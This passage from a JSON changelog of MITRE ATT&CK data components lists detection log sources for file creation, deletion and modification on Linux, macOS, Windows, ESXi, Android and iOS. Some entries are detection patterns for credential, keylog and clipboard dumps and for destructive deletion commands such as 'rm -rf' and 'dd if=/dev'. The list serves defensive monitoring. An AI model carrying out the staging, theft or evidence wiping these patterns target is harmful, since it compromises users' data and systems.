                            "channel": "file creation/modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file write/create"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "file write"
                        },
                        {
                            "name": "snmp:syslog",
                            "channel": "firmware write/log event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,creat,rename: Writes in $HOME/Downloads, /tmp, ~/.cache with exe/script/archive/office extensions"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Create in /Users/*/Downloads or /private/var/folders/* with quarantine attribute"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file events"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMFS file creation"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write/open, FIM audit"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "open/write/exec calls"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .plist under /Library/Managed Preferences/"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "creat"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "disk activity on /Library/LaunchAgents or LaunchDaemons"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: Write to ~/.vscode-cli/code_tunnel.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "creation of ~/.vscode-cli/code_tunnel.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create/modify dylib files in monitored directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "New files in /tmp, /var/tmp, $HOME/.cache, executed within TimeWindow after browser HTTP fetch"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "New files written to /var/folders, /tmp, ~/Library/Caches, or ~/Downloads by browser context or its children"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: New file created in system binaries or temp directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File created in ~/Library/LaunchAgents or executable directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, unlink, rename: File creation or deletion involving critical stored data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process wrote large .mov/.mp4 in user temp/hidden dirs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "logd:file write"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "File IO"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "creat, open, write on /etc/systemd/system and /usr/lib/systemd/system"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Attachment files written to ~/Downloads or temporary folders"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file activity"
                        },
                        {
                            "name": "CloudTrail:PutObject",
                            "channel": "PutObject"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "Creation of files with extensions .sql, .csv, .sqlite, especially in user directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Writes of .sql/.csv/.xlsx files to user documents/downloads"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "New .py/.js/.sh files written to ~/.local/, ~/.cache/, or /tmp/ within 5 min of package install"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write, open, or rename to /etc/systemd/system/*.service"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of .zip, .gz, .bz2 files in /tmp, /var/tmp, or /home directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip, .gz, .dmg archives in /Users, /tmp, or application directories"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file open/write"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_CREATE: path under /Users/*/(Downloads|Desktop|Library/*/Containers|Library/Group Containers) AND extension in SuspiciousExtensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/create/rename: name in (/home/*/Downloads/*|/tmp/*|/run/user/*|/media/*) AND ext in SuspiciousExtensions"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of archive files in /tmp, /var/tmp, or user home directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip, .dmg, .tar.gz files in /Users, /tmp, or application directories"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File Events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "File creations of *.qcow2, *.vdi, *.vmdk outside standard VM directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation or modification of postinstall scripts within .pkg or .mpkg contents"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: File creation under /tmp, /var/tmp, ~/.cache with executable bit or shell shebang"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create: New files in /tmp or ~/Library/Application Support/* with executable or script extensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write, unlink"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "File creation of suspicious scripts/binaries in temporary directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation of unsigned binaries/scripts in user cache or download directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "File creation events in /var/mail or /var/spool/mail exceeding baseline thresholds"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "create: Attachment file creation in ~/Library/Mail directories"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Shell-Core",
                            "channel": "New startup folder shortcut or binary placed in Startup directory"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write or create file after .bash_history access"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "new file created in /var/www/html, /srv/http, or similar web root"
                        },
                        {
                            "name": "fs:launchdaemons",
                            "channel": "file_create"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "mount target path within /proc/*"
                        },
                        {
                            "name": "macos:fsevents",
                            "channel": "/Library/StartupItems/, ~/Library/LaunchAgents/"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "write or chmod to ~/Library/LaunchAgents/*.plist"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "creation of .so files in non-standard directories (e.g., /tmp, /home/*)"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of files with anomalous headers and entropy levels in /tmp or user directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of files with anomalous headers and entropy values"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Access or modification to /lib/modules or creation of .ko files"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Directory events (kFSEventStreamEventFlagItemCreated)"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "drive.activity logs"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "create/write/rename in user-writable paths"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "WRITE: Drop of binaries/scripts in ~/.local, /tmp, or /opt tool dirs"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE/MODIFY: Creation of LaunchAgents/Daemons plists in user/system locations"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,create"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Creation of hidden files (.*) in sensitive directories (/etc, /var, /usr/bin)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of LaunchAgents/LaunchDaemons in hidden or non-standard directories"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "create: Creation of files ending in .tar, .gz, .bz2, .zip in /tmp or /var/tmp"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of .zip or .dmg files in user-accessible or temporary directories"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file write"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_open"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file create or modify in /etc/emond.d/rules or /private/var/db/emondClients"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,creat,rename,write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Writes under ~/Library/Application Support/Code*/extensions or JetBrains plugins"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "PutObject"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "large file write originating from /mnt/usb or external mounted storage"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 17:17:05.280000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][89]\": {\"name\": \"android:logcat\", \"channel\": \"App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"android:logcat\", \"channel\": \"App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  \"}, \"root['x_mitre_log_sources'][92]\": {\"name\": \"android:logcat\", \"channel\": \"Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/\"}, \"root['x_mitre_log_sources'][94]\": {\"name\": \"android:logcat\", \"channel\": \"Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy\"}, \"root['x_mitre_log_sources'][95]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy\"}, \"root['x_mitre_log_sources'][96]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)\"}, \"root['x_mitre_log_sources'][99]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)\"}, \"root['x_mitre_log_sources'][100]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\\\\\.db|\\\\\\\\.txt|\\\\\\\\.log\"}, \"root['x_mitre_log_sources'][101]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container\"}, \"root['x_mitre_log_sources'][102]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\\\\\.(db|sqlite|txt|log)\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container\"}, \"root['x_mitre_log_sources'][104]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\\\\\.(db|sqlite|json|txt)\"}, \"root['x_mitre_log_sources'][105]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container\"}, \"root['x_mitre_log_sources'][106]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\\\\\.(json|txt|db)\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\\\\\.(json|plist|db)\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\\\\\.(json|txt|db|plist)\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of /Library/Caches/security_inventory.*\\\\\\\\.(json|plist|db)\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content\"}, \"root['x_mitre_log_sources'][111]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection\"}, \"root['x_mitre_log_sources'][112]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"large file write originating from /mnt/usb or external mounted storage\"}, \"root['x_mitre_log_sources'][113]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer\"}, \"root['x_mitre_log_sources'][114]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow\"}, \"root['x_mitre_log_sources'][115]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class\"}, \"root['x_mitre_log_sources'][116]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity\"}, \"root['x_mitre_log_sources'][117]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission\"}, \"root['x_mitre_log_sources'][118]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission\"}, \"root['x_mitre_log_sources'][119]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission\"}, \"root['x_mitre_log_sources'][120]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity\"}, \"root['x_mitre_log_sources'][121]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity\"}, \"root['x_mitre_log_sources'][122]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication\"}, \"root['x_mitre_log_sources'][123]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase\"}, \"root['x_mitre_log_sources'][124]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer\"}, \"root['x_mitre_log_sources'][125]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect\"}, \"root['x_mitre_log_sources'][126]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement\"}, \"root['x_mitre_log_sources'][127]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:19:16.114000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0040",
                            "external_id": "DC0040"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Deletion",
                    "description": "Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink/unlinkat on service binaries or data targets"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file deletion"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell history"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=23"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "delete action"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, unlinkat, openat, write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec rm -rf|dd if=/dev|srm|file unlink"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, unlinkat, rmdir"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink, rename, open"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=23"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "unlink, fs_delete"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "container file operations"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "rm, clearlogs, logrotate"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Datastore file operations"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE, DELETE, WRITE: Stored data manipulation attempts by unauthorized processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "unlink/unlinkat"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Backup",
                            "channel": "Windows Backup Catalog deletion or catalog corruption"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "/etc/fstab, /etc/systemd/*"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:19:16.114000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][22]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer\"}, \"root['x_mitre_log_sources'][23]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime\"}, \"root['x_mitre_log_sources'][24]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-16 16:41:53.549000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0061",
                            "external_id": "DC0061"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Modification",
                    "description": "Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples: \n\n- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\\Windows\\System32\\drivers\\etc\\hosts` on Windows.\n- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.\n- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.\n- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.\n- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
